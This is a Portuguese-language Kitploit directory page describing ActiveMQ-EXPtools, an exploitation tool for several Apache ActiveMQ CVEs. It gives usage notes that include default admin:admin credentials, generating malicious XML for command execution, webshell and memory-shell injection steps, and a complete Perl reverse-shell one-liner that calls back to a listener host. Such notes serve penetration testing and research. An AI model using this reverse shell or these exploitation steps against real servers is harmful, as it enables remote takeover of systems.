Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
ActiveMQ-EXPtools — Ferramenta abrangente de exploração de vulnerabilidades do Apache ActiveMQ (CVE-2015-5254, CVE-2016-3088, CVE-2022-41678, CVE-2023-46604, CVE-2024-32114, CVE-2026-34197, CVE-2026-40466, CVE-2026-42588) | Kitploit
Ferramentas/GitHubGitHub/catherines77/activemq-exptools
Análise de VulnerabilidadesExploraçãoShellcodeExploração de Aplicações WebTestes de PenetraçãoDesenvolvimento de Payloads
GitHubcatherines77/activemq-exptools

ActiveMQ-EXPtools

Ferramenta abrangente de exploração de vulnerabilidades do Apache ActiveMQ (CVE-2015-5254, CVE-2016-3088, CVE-2022-41678, CVE-2023-46604, CVE-2024-32114, CVE-2026-34197, CVE-2026-40466, CVE-2026-42588)

Ver Repositório
8391há 2 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

ActiveMQ-EXPtools

Suporta detecção e exploração de vulnerabilidades do Apache ActiveMQ: CVE-2015-5254, CVE-2016-3088, CVE-2022-41678, CVE-2023-46604, CVE-2024-32114, CVE-2026-34197, CVE-2026-40466, CVE-2026-42588

image-20260420111234916

[!WARNING] Esta ferramenta é destinada apenas para pesquisa de segurança e fins educacionais. O utilizador assume toda a responsabilidade legal e relacionada decorrente do uso desta ferramenta. Certifique-se de que as suas ações estão em conformidade com as leis e regulamentos locais. O autor não assume qualquer responsabilidade. Se não concordar, não utilize esta ferramenta.

Iniciar com jdk8, porta padrão Openwire 61616, por vezes o ambiente alvo pode não a ter aberta. Nome de utilizador e palavra-passe padrão do Apache ActiveMQ: admin:admin. O painel de configuração BeanXML pode gerar XML malicioso para executar comandos correspondentes. Se tiver problemas, sinta-se à vontade para abrir uma Issue.

Ao detetar vulnerabilidades, pode definir o endereço do servidor XML malicioso para dnslog; se receber um pedido, pode indicar a existência de CVE-2023-46604, CVE-2026-34197, CVE-2026-40466, CVE-2026-42588

Notas sobre a exploração de algumas vulnerabilidades

CVE-2015-5254

O java-chains gera dados de desserialização; para verificar a vulnerabilidade, pode usar URLDNS

Ao obter uma shell reversa, é melhor usar perl; sh e bash podem não funcionar às vezes

root@kitploit:~
/usr/bin/perl -e 'use Socket;$i="192.168.239.129";$p=2333;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

image-20260420110252750

CVE-2022-41678

Ao escrever um webshell personalizado, a escrita da shell do BingXie (IceScorpion) gera erro 500, enquanto a Godzilla funciona normalmente. Ao ligar a ferramenta, lembre-se de adicionar o cabeçalho de autenticação

Injeção de memória shell

A partir da versão 1.4, o módulo de geração de memória shell MemShellParty não está mais integrado, por um lado porque o ficheiro fatjar fica inchado, por outro lado porque o método de descodificação base64 necessário para o SpringBeanXmlClassLoader não é universal em diferentes versões do Java, o que obriga a ferramenta a reinventar a roda. Os utilizadores que precisam de memória shell podem consultar o seguinte fluxo para gerar XML:

Primeiro, no MemShellParty, gere a string base64 da memória shell correspondente https://party.mem.mk/ui

image-20260508110638599

Depois vá ao java-chains, encontre Generate-OtherPayload, e selecione bytecode personalizado

0

Escolha o método de descodificação base64 de acordo com a versão do JDK; por predefinição é o método decodeFromString, enquanto o ambiente CVE-2026-34197 do vulhub precisa de selecionar java.util.Base64

Finalmente, insira a string Base64 da memória shell e clique em gerar

image-20260508110858921

Para tipos Filter, Listener ou Servlet, ao endereço de ligação da memória shell é necessário adicionar o caminho /admin/, /api/, e o cabeçalho de autenticação; o handler não precisa de caminho nem cabeçalho de autenticação

Agradecimentos

https://github.com/URJACK2025/CVE-2022-41678

https://github.com/vulhub/vulhub

https://github.com/ReaJason/MemShellParty

https://github.com/1diot9/MyJavaSecStudy/blob/5504868a7cba4bf674fe6974fe8f613e556e5d42/Apache/ActiveMQ/CVE-2026-40466/poc/CVE-2026-40466_HTTP_Discovery_RCE_Analysis.md

https://github.com/vulhub/java-chains

Baixar ferramenta